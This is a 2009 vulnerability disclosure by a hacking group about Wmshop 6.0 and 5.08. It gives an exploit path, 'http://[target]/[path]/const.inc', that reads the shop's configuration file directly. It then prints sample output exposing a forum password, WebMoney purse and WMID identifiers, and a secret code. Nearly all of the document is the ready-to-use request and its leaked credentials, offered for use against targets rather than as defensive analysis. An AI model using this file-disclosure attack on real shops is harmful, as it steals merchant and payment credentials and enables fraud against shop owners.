wmshop-disclose.txt
Posted on 23 July 2009
< ------------------- header data start ------------------- > ### Cyber-Warrior & Security TIM - Bug Researchers Group ### # Application Name : Wmshop 6.0 - 5.08 # Vulnerable Type : Arbitrary Forum Password Disclosure Vulnerability # Infection : Forum Password Get... # Author : Septemb0x # Script Down.& WebSite : http://s2.dosya.tc/wmshop_6.0.rar.html - http://s2.dosya.tc/wmshop_5.08.rar.html - https://merchant.webmoney.ru/conf/purses.asp ### Cyber-Warrior & Security TIM - Bug Researchers Group ### < ------------------- header data end of ------------------- > < -- bug code start -- > EXPLOIT : http://[target]/[path]/const.inc GET TO; <? $serv_const_name="shop"; $serv_const_embox="support@shop.ru"; $serv_const_forum_pass="Gdssn6Fdgh"; $serv_const_servname="localhost"; $serv_const_commission="0.05"; $serv_const_lstcount="25"; $serv_const_lstrekom="20"; $serv_const_shopwmz="Z65656565665"; $serv_const_shopwmid="645634564556"; $serv_const_secretcod_wmid="gFdGdx2d5FGmJt5DevALJg6"; ?> < -- bug code end of -- > # Greetz : BHDR & BARCOD3 & Cem & Asil Bey And All Friends... _________________________________________________________________ http://www.microsoft.com/turkiye/windows/windowslive/products/photo-gallery-edit.aspx
